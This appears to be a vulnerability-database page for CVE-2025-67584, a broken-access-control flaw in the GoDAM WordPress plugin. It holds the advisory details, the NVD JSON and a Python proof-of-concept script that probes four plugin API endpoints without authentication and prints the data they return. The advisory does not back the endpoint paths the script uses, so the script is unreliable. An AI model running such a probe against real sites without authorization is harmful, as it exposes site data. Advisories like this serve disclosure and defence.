Security Vulnerability Report
中文
CVE-2025-67584 CVSS 5.3 MEDIUM

CVE-2025-67584

Published: 2025-12-09 16:18:36
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in rtCamp GoDAM godam allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GoDAM: from n/a through <= 1.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

rtCamp GoDAM WordPress Plugin <= 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67584 GoDAM Plugin Access Control Bypass PoC # Affected: rtCamp GoDAM WordPress Plugin <= 1.4.6 # Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "https://vulnerable-site.com" # Replace with target URL WP_PATH = "/wp-json/godam/v1/" # GoDAM API endpoint def check_vulnerability(): """Check if GoDAM plugin is vulnerable to CVE-2025-67584""" # Test unauthenticated access to protected endpoints vulnerable_endpoints = [ "/wp-json/godam/v1/settings", "/wp-json/godam/v1/media/list", "/wp-json/godam/v1/config", "/wp-json/godam/v1/optimize" ] print(f"[*] Testing GoDAM Plugin for CVE-2025-67584") print(f"[*] Target: {TARGET_URL}") print("-" * 50) for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint} (Status: {response.status_code})") else: print(f"[*] Unknown: {endpoint} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67584", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:36.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in rtCamp GoDAM godam allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GoDAM: from n/a through <= 1.4.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/godam/vulnerability/wordpress-godam-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}